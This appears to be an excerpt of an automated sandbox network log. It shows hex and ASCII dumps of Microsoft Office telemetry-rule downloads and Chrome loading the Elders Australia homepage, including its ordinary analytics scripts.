                                                                                                                                    34192.168.2.44979813.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 419
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                    x-ms-request-id: 11ffd83c-b01e-003d-6a61-2ed32c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080316Z-158dbd74bf4xn2d5hC1SN1962w00000003tg000000001c4m
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:16 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    35192.168.2.44979913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 404
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                    x-ms-request-id: d33e01be-001e-0082-0958-2e5880000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080316Z-157b9fd754f5nn7qhC1SN19asn00000003zg000000004ffe
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:16 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    36192.168.2.44979713.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 468
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                    x-ms-request-id: a07dceec-d01e-0066-4c3b-2eea17000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080316Z-158dbd74bf4fwv52hC1SN1tbkg00000003pg000000004bku
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    37192.168.2.44979613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 472
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                    x-ms-request-id: f9b7bb91-701e-0021-1460-2e3d45000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080316Z-157b9fd754fbhrh6hC1SN1yhsw00000002fg000000001vqs
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:16 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    38192.168.2.449802162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC718OUTGET / HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                    Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:16 UTC660INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:16 GMT
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    last-modified: Tue, 05 Nov 2024 06:26:33 GMT
                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                    expires: Tue, 05 Nov 2024 08:05:40 GMT
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 156
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    Set-Cookie: affinity="e47c197095b8b7ee"; Path=/; HttpOnly; secure
                                                                                                                                    x-served-by: cache-dfw-kdfw8210061-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730793797.712266,VS0,VS0,VE58
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb538d5d6a0c46-DFW
                                                                                                                                    2024-11-05 08:03:16 UTC709INData Raw: 37 64 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 65 6d 70 6c 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6c 64 65 72 73 2d 2d 2d 68 6f 6d 65 2d 70 61 67 65 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 21
                                                                                                                                    Data Ascii: 7d0a<!DOCTYPE HTML><html lang="en"><head> <meta charset="UTF-8"/> <title>Home</title> <meta name="template" content="elders---home-page"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <!
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 65 22 20 63 6f 6e 74 65 6e 74 3d 22 48 6f 6d 65 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 2f 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 2f 65 74 63 2e 63 6c 69 65 6e 74 6c 69 62 73 2f 65 6c 2f 63 6c 69 65 6e 74 6c 69 62 73 2f 63 6c 69 65 6e 74 6c 69 62 2d 73 69 74 65 2f 72 65 73 6f 75 72 63 65 73 2f 69 6d 61 67 65 73 2f 70 6e 67 2f 6c 6f 67 6f 2d
                                                                                                                                    Data Ascii: e" content="Home"/> <meta name="twitter:description"/> <meta name="twitter:url" content="https://elders.com.au/"/> <meta name="twitter:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 35 36 32 36 34 65 30 61 35 66 39 61 33 30 35 36 66 38 64 63 61 34 33 63 33 2d 6c 63 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 0a 0a 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 3f 72 65 6e 64 65 72 3d 36 4c 63 56 66 4d 55 6b 41 41 41 41 41 45 7a 74 77 63 42 46 50 70 7a 43 51 51 61 69 4d 44 77 41 47 79 62 6f 55 4b 61 46 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 30 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c
                                                                                                                                    Data Ascii: 56264e0a5f9a3056f8dca43c3-lc.min.css" type="text/css"> <script src="https://www.google.com/recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"><
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 34 66 63 39 2e 6d 69 6e 2e 6a 73 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 21 2d 2d 20 4d 65 74 61 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 21 66 75 6e 63 74 69 6f 6e 20 28 66 2c 20 62 2c 20 65 2c 20 76 2c 20 6e 2c 20 74 2c 20 73 29 20 7b 0a 20 20 69 66 20 28 66 2e 66 62 71 29 20 72 65 74 75 72 6e 3b 20 6e 20 3d 20 66 2e 66 62 71 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 20 3f 0a 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 2e 61 70 70 6c 79 28 6e 2c 20 61 72 67 75 6d 65 6e 74 73 29 20 3a 20 6e 2e 71 75 65 75 65 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 20 20 7d 3b 0a 20 20 69 66 20 28 21 66 2e 5f 66 62 71 29 20 66 2e 5f 66 62 71 20
                                                                                                                                    Data Ascii: 4fc9.min.js" async></script>... Meta Pixel Code --><script>!function (f, b, e, v, n, t, s) { if (f.fbq) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, arguments) : n.queue.push(arguments) }; if (!f._fbq) f._fbq
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 74 61 67 2f 22 2b 69 3b 0a 20 20 20 20 20 20 79 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 72 29 5b 30 5d 3b 79 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 79 29 3b 0a 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 63 6c 61 72 69 74 79 22 2c 20 22 73 63 72 69 70 74 22 2c 20 22 6d 75 70 73 6a 72 6d 77 37 66 22 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 0a 20 20 20 20 0a 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 65 74 63 2e 63 6c 69 65 6e 74 6c 69 62 73 2f 65 6c 2f 63 6c 69 65 6e 74 6c 69 62 73 2f 63 6c 69 65 6e 74 6c 69 62 2d 64
                                                                                                                                    Data Ascii: https://www.clarity.ms/tag/"+i; y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "mupsjrmw7f");</script> <script src="/etc.clientlibs/el/clientlibs/clientlib-d
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 32 44 68 6f 6d 65 5c 75 30 30 32 44 70 61 67 65 5c 78 32 32 2c 5c 78 32 32 78 64 6d 3a 74 61 67 73 5c 78 32 32 3a 5b 5d 2c 5c 78 32 32 73 65 61 72 63 68 54 65 72 6d 5c 78 32 32 3a 6e 75 6c 6c 2c 5c 78 32 32 70 72 65 76 69 6f 75 73 50 61 67 65 55 52 4c 5c 78 32 32 3a 6e 75 6c 6c 2c 5c 78 32 32 70 72 69 6d 61 72 79 43 61 74 65 67 6f 72 79 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 64 63 3a 74 69 74 6c 65 5c 78 32 32 3a 5c 78 32 32 48 6f 6d 65 5c 78 32 32 2c 5c 78 32 32 72 65 70 6f 3a 6d 6f 64 69 66 79 44 61 74 65 5c 78 32 32 3a 5c 78 32 32 32 33 5c 75 30 30 32 44 31 30 5c 75 30 30 32 44 32 30 32 34 20 32 33 3a 32 39 3a 34 36 5c 78 32 32 2c 5c 78 32 32 62 72 61 6e 64 5c 78 32 32 3a 5c 78 32 32 65 6c 64 65 72 73 5c 78 32 32 2c 5c 78 32 32 63 6f 6e
                                                                                                                                    Data Ascii: 2Dhome\u002Dpage\x22,\x22xdm:tags\x22:[],\x22searchTerm\x22:null,\x22previousPageURL\x22:null,\x22primaryCategory\x22:\x22\x22,\x22dc:title\x22:\x22Home\x22,\x22repo:modifyDate\x22:\x2223\u002D10\u002D2024 23:29:46\x22,\x22brand\x22:\x22elders\x22,\x22con
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 31 32 20 61 65 6d 2d 47 72 69 64 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 32 20 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 20 6e 61 76 69 67 61 74 69 6f 6e 20 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 20 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 32 22 3e 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 20 20 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 6e 74 5f 5f 68 65 61 64 65 72 2d 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 6e 74 5f 5f 68 65 61 64 65 72 2d 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 74 65 73 74 22 20 63 6c 61
                                                                                                                                    Data Ascii: 12 aem-Grid--default--12 "> <div class="header navigation aem-GridColumn aem-GridColumn--default--12"> <div class="print__header--container"> <div class="print__header--image-container"> <a href="#test" cla
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 62 26 23 33 34 3b 2c 26 23 33 34 3b 78 64 6d 3a 6c 69 6e 6b 55 52 4c 26 23 33 34 3b 3a 26 23 33 34 3b 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 64 65 72 73 69 6e 73 75 72 61 6e 63 65 2e 63 6f 6d 2e 61 75 2f 26 23 33 34 3b 2c 26 23 33 34 3b 40 74 79 70 65 26 23 33 34 3b 3a 26 23 33 34 3b 65 6c 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 68 65 61 64 65 72 2f 76 31 2f 68 65 61 64 65 72 26 23 33 34 3b 2c 26 23 33 34 3b 64 63 3a 74 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 49 6e 73 75 72 61 6e 63 65 26 23 33 34 3b 2c 26 23 33 34 3b 69 6e 74 65 72 61 63 74 69 6f 6e 54 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 48 65 61 64 65 72 3a 4e 61 76 69 67 61 74 69 6f 6e 26 23 33 34 3b 7d 7d 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 73 75 72 61 6e 63 65 0a 20 20 20 20 20 20 3c
                                                                                                                                    Data Ascii: b&#34;,&#34;xdm:linkURL&#34;:&#34;https://www.eldersinsurance.com.au/&#34;,&#34;@type&#34;:&#34;el/components/header/v1/header&#34;,&#34;dc:title&#34;:&#34;Insurance&#34;,&#34;interactionTitle&#34;:&#34;Header:Navigation&#34;}}"> Insurance <
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 61 74 69 6f 6e 26 23 33 34 3b 7d 7d 22 3e 0a 20 20 20 20 20 20 20 20 48 6f 6d 65 20 26 61 6d 70 3b 20 43 6f 6d 6d 65 72 63 69 61 6c 20 46 69 6e 61 6e 63 65 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 0a 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 64 65 72 73 77 65 61 74 68 65 72 2e 63 6f 6d 2e 61 75 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 63 6d 70 2d 63 6c 69 63 6b 61 62 6c 65 20 64 61 74 61 2d 63 6d 70 2d 64 61 74 61 2d 6c 61 79 65 72 3d 22 7b 26 23 33 34 3b 68 65 61 64 65 72 2d 35 38 63 66 35 38 34 38 33 64
                                                                                                                                    Data Ascii: ation&#34;}}"> Home &amp; Commercial Finance </a> </li> <li class="nav-item"> <a class="nav-link" href="https://www.eldersweather.com.au/" target="_blank" data-cmp-clickable data-cmp-data-layer="{&#34;header-58cf58483d
                                                                                                                                    2024-11-05 08:03:16 UTC1369INData Raw: 23 33 34 3b 68 65 61 64 65 72 26 23 33 34 3b 2c 26 23 33 34 3b 63 6f 6d 70 6f 6e 65 6e 74 54 69 74 6c 65 26 23 33 34 3b 3a 26 23 33 34 3b 4c 61 74 65 73 74 20 53 68 61 72 65 20 50 72 69 63 65 26 23 33 34 3b 2c 26 23 33 34 3b 6e 61 6d 65 26 23 33 34 3b 3a 26 23 33 34 3b 61 73 78 69 67 75 61 6e 61 26 23 33 34 3b 2c 26 23 33 34 3b 6c 69 6e 6b 55 52 4c 26 23 33 34 3b 3a 26 23 33 34 3b 2f 63 6f 6e 74 65 6e 74 2f 65 6c 64 2f 61 75 2f 65 6e 2f 66 6f 72 2d 69 6e 76 65 73 74 6f 72 73 26 23 33 34 3b 2c 26 23 33 34 3b 6f 70 65 6e 49 6e 4e 65 77 54 61 62 26 23 33 34 3b 3a 26 23 33 34 3b 66 61 6c 73 65 26 23 33 34 3b 7d 7d 22 3e 3c 2f 65 6c 64 2d 63 75 73 74 6f 6d 2d 61 73 78 2d 69 67 75 61 6e 61 3e 0a 0a 0a 20 20 20 20 0a 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: #34;header&#34;,&#34;componentTitle&#34;:&#34;Latest Share Price&#34;,&#34;name&#34;:&#34;asxiguana&#34;,&#34;linkURL&#34;:&#34;/content/eld/au/en/for-investors&#34;,&#34;openInNewTab&#34;:&#34;false&#34;}}"></eld-custom-asx-iguana> </div>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    39192.168.2.449803162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:16 UTC600OUTGET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
